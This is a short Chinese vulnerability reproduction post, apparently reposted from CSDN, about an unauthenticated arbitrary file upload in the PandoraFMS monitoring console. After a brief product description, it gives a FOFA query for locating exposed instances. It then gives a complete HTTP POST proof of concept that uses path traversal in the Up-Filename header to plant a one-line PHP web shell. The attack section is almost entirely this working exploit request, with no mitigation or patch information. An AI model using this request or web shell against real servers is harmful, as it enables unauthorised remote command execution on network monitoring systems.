PandoraFMS 监控软件任意文件上传漏洞复现

news/2025/1/20 22:04:27/文章来源:https://blog.csdn.net/qq_41904294/article/details/134890038

0x01 产品简介

Pandora FMS 是用于监控计算机网络的软件。 Pandora FMS 允许以可视化方式监控来自不同操作系统、服务器、应用程序和硬件系统（例如防火墙、代理、数据库、Web 服务器或路由器）的多个参数的状态和性能。

0x02 漏洞概述

PandoraFMS upload_head_image.php 接口处存在未授权文件上传漏洞，攻击者可上传恶意木马获取服务器权限。

0x03 复现环境

FOFA：app="PANDORAFMS-产品"

0x04 漏洞复现

PoC

POST /pandora_console/enterprise/meta/general/upload_head_image.php?up=true HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Up-Filename: ../../../../../../../../../../var/www/html/pandora_console/extensions/rce.php
Accept-Encoding: gzip
Connection: close<?php system($_REQUEST['c']); ?>

直接上传一句话

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/209049.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！